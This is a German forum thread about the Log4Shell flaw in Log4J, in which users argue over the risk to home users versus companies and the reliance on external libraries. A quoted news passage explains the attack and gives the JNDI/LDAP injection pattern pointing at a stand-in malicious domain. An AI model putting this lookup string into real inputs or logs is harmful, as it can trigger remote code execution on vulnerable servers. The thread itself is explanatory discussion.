Kommt mir doch sehr leichtgläubig vor.
Für ein Zombienetz ist egal, wo die Zombies stehen, z.b. Rechner am Netz ist Ziel genug.
Computerprobleme
-
-
Warum Log4Shell so gefährlich ist und was (nicht) hilft
Golem
Ausführlich und zumindest für mich verständlich.
ZitatZum erfolgreichen Ausnutzen der Lücke reicht es letztlich also aus, einen eigenen LDAP-Server zum Verweis auf die Malware zu betreiben und das Ziel mit Log4J dazu zu bringen, den Aufruf zu loggen und dann auszuführen.
Der Aufruf folgt dabei etwa diesem Muster:
${jndi:ldap://boese-domain.golem.de/a}.
Ist das angegriffene Ziel im Netz verfügbar, führt dies leicht zu einer Remote-Code-Execution (RCE), also dem Ausführen von Schadcode. Erste Beispiele dafür zeigten Nutzer bereits in der vergangenen Woche für Steam, die iCloud oder die Java-Edition von Minecraft, die mit Hilfe von Chat-Nachrichten übernommen werden konnte.
Das ist halt recht einfach, und da das Problem seit 2013? existiert, könnten schon lange irgendwelche Hintertüren eingebaut sein.
-
Kommt mir doch sehr leichtgläubig vor.
Für ein Zombienetz ist egal, wo die Zombies stehen, z.b. Rechner am Netz ist Ziel genug.
Na dann bin ich gespannt auf deine Einschätzung des Risikos für Privatpersonen
-
Ich auch.
-
Was genau hättest du jetzt gerne eingeschätzt?
-
Ich schwinge mich mal mit ins Boot und frage nach einem konkreten Szenario, und unter welchen Umständen es zustande käme. Sprich: Was passiert, und was sind die KOnsequenzen?
-
Jetzt mal unabhängig von der konkreten Gefährdung habe ich es beim querlesen einigermaßen richtig verstanden, dass ich als normal-DAU quasi außer regelmäßig Updates ziehen und das Beste hoffen keinen „Auftrag“ habe?
-
Richtig.
Es gibt schon ein Szenario für Privatmenschen, das aber nur für die Geräte eine Rolle spielt, die die besagte Java-Bibliothek zum Loggen ab einer bestimmten Version nutzt. Und das Gerät muss von außen erreichbar sein.
Die Problematik ist für Unternehmen weit, weit größer. Und da ist sie dann aber auch gleich richtig groß.
-
Danke! Dann viel Erfolg beim Welt retten.
-
Was genau hättest du jetzt gerne eingeschätzt?
Naja du nennst meine Einschätzung "sehr leichtgläubig". Da gehe ich natürlich davon aus, dass du Risiko/Eintrittswahrscheinlichkeit/Auswirkung anders einschätzt als ich.
Darauf bin ich eben gespannt
-
-
@prickel.
Dass Heimanwender betroffen sind, steht außdrücklich in dem von Andro verlinkten Heise-Artikel.
Das Heimcomputer Angriffsziele sind, halte ich für offensichtlich. Das war über die gesamte Geschichte des Internets nicht anders. Mein Beispiel mit Zombienetzen mag etwas historisch sein, wobei ich das nichtmal glaube, aber das ist nur eine willkürliche Nutzungsmöglichkeit. Heute dürften aber Identitätsdiebstahl und Zugriff auf Online-Accounts wichtiger sein.
Ich meine, wir leben in einer Welt, in der Facebook-Konten gehackt werden. Und in der Zombies eingesetzt werden, um DDOS-Attacken durchzuführen oder überhaupt nur irgendwo die Clickzahlen hochzutreiben.
Ich bin halt der Meinung, dass der Satz: "Warum sollte Andi aus Hannover irgendjemand was böses wollen?" sehr, sehr unrealistisch ist. Es geht mir nicht darum, Angst zu verbreiten, aber so einfach ist es nun auch nicht. Meine ich.
-
Schon richtig, ich sehe die reale Bedrohung weit eher in Attacken, die Schadcode in Firmen ausführen lassen wollen (simpel formuliert). Das gibt die Lücke einfach par excellence her.
-
Ich finde das ein Feature.
EDIT: Aber Schadenfreude hin oder her: Es war in erster Linie diese eine zitierte Formulierung, die mich dazu brachte, überhaupt was dazu zu schreiben.
-
Mach es wie wir: Einer unserer internen Jira-Server wäre theoretisch betroffen, wenn die verwendete Log4J-Bibliothek nicht so elendig alt wäre, dass sie die Lücke noch gar nicht 'implementiert' hat.
-
Eine Log-Datei, die Code ausführt. Was für ein Schwachsinn.
Ich schaffe es einfach nicht, Mitleid mit sowas aufzubringen.
-
Mach es wie wir: Einer unserer internen Jira-Server wäre theoretisch betroffen, wenn die verwendete Log4J-Bibliothek nicht so elendig alt wäre, dass sie die Lücke noch gar nicht 'implementiert' hat.
Classic
-
thefireraven: Ich weiß gar nicht, was ich sagen soll.
Ist aber tatsächlich nur intern.ExilRoter: Was mich am meisten erstaunt, ist die Tatsache, dass das erst jetzt aufgeflogen ist. Und wie kann es sein, dass selbst die Logeinträge potentiell gefährlich sind? Uff....
-
Was mich am meisten erstaunt, ist die Tatsache, dass das erst jetzt aufgeflogen ist. Und wie kann es sein, dass selbst die Logeinträge potentiell gefährlich sind? Uff....
Mein Reden.
Irgendwas ist da gewaltig schiefgelaufen in der IT-Industrie in den letzten Jahren und Jahrzehnten...
-
Also mal ab von dem aktuellen Fall, ist ein Problem z.B., dass jeder für jede Aufgabe eine externe Bibliothek nutzt.
Sicherlich gibt es genug Szenarien, in denen man eine Logging-Bibliothek nicht selber schreiben möchte, weil über das einfache Logging hinaus die RollOver-Mechanismen für die Lebensdauer der einzelnen Logfiles schon etwas komplexer sind, und man das nicht immer selber machen möchte. Kann ich verstehen. Es fielen mir auch noch andere Gründe ein.
Aber wenn ich daran denke, dass ich schon gezwungen wurde, für banalstes Logging einer überschaubaren WebApp log4net einzusetzen, weil das eben Standard sei, dann weiß ich, wieso es an allen Ecken und Enden brennt, wenn in einer solchen Bibliothek Schrottcode entdeckt wird.
Für das kleine Logging schreibe ich mir die Library als schnuckeliges internes Nuget-Package lieber selber und feddisch.
-
Ich würde sagen die Verwendung ist sogar der richtige Weg, da müssen wir das Rad nicht zig mal neu erfinden. Der Invest in OpenSource kommt aber zu kurz und so entsteht dann Scheiße. Da sind gerade große Firmen stärker gefragt
-
